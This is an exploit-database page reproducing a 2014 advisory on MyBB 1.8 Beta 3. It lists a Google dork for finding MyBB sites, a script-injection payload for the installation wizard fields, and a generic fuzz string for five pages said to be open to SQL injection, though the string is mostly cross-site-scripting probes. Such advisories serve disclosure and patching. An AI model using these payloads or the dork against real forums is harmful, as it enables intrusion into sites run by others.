MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection

vendor:

MyBB

by:

DemoLisH

8,8

CVSS

HIGH

Cross Site Scripting & SQL Injection

89, 89, 89, 89, 89, 89

CWE

Product Name: MyBB

Affected Version From: 1.8 Beta 3

Affected Version To: 1.8 Beta 3

Patch Exists: YES

Related CWE: N/A

CPE: a:mybb:mybb:1.8_beta3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

MyBB 1.8 Beta 3 – Cross Site Scripting & SQL Injection

Cross Site Scripting can be exploited by filling the Forum Name, Website Name, and Website URL fields with malicious code during the installation wizard. SQL Injection can be exploited by searching for malicious code keywords in the Inbox, Show Thread, Search, Help Documents, and Forum Display pages.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
Now let's finish setup and go to the homepage.


b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example:localhost/private.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


c) SQL Injection in Showthread
Go to -> Show Thread, for example:localhost/showthread.php?tid=1
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


d) SQL Injection in Search
Go to -> Search, for example:localhost/search.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


e) SQL Injection in Help Documents
Go to -> Help Documents, for example:localhost/misc.php?action=help
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


f) SQL Injection in Forum Display
Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

***************************************************
[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.